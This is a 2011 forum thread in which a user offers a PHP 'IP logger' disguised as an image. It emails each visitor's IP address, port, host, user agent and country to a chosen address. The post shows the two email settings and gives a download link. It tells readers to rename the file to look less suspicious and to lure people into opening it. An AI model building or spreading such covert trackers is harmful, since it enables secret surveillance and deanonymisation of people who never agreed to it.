[source] ip logger through images! [sent to email!]

Discussion in 'PHP' started by _MASTER, Dec 19, 2011.

  1. #1
    Ok guys, I coded a little IP logger in an image withPHP, it emails the details to a email that you specify!

    Example of log from PHP file. (hidemyass.com IP)
    logy.jpg

    LOGS
    [ * ]Ip Addresss
    [ * ]Port Accessed
    [ * ]Host Address
    [ * ]User Agent
    [ * ]Date
    [ * ]Country Flag

    I've also dynamically linked the IP:pORT and the FLAG to do a ip lookup through geobytes.com, providing a more in-depth result! ;)

    All you have to do is edit these variables in the script to your liking
    
    $headers .='From: EXAMPLE@EXAMPLE.COM' . "\r\n"; //WHATEVER YOU WANT
    PHP:
    
    $to = 'YOUREMAIL@HERE.COM'; // YOUR EMAIL ADDRESS YOU WANT THE LOGS SENT TO!
    PHP:

    Just rename the file to something less suspicious! and then upload to a free webhost, or your own hosting, then get people to visit it ;)

    DOWNLOAD
    : http://file ice.net/download.php?file=rz1h (remove space)
     
    _MASTER, Dec 19, 2011 IP
  2. _MASTER

    _MASTER Peon

    Messages:
    3
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Hope you guys are all enjoying this script! I've updated the download link with a super advanced one! get in quick :D
     
    _MASTER, Dec 21, 2011 IP
  3. _MASTER

    _MASTER Peon

    Messages:
    3
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    For more scripts, visit: welogtools.blogspot.com ;) (remove spaces)
    you won't be dissapointed!
     
    _MASTER, Dec 21, 2011 IP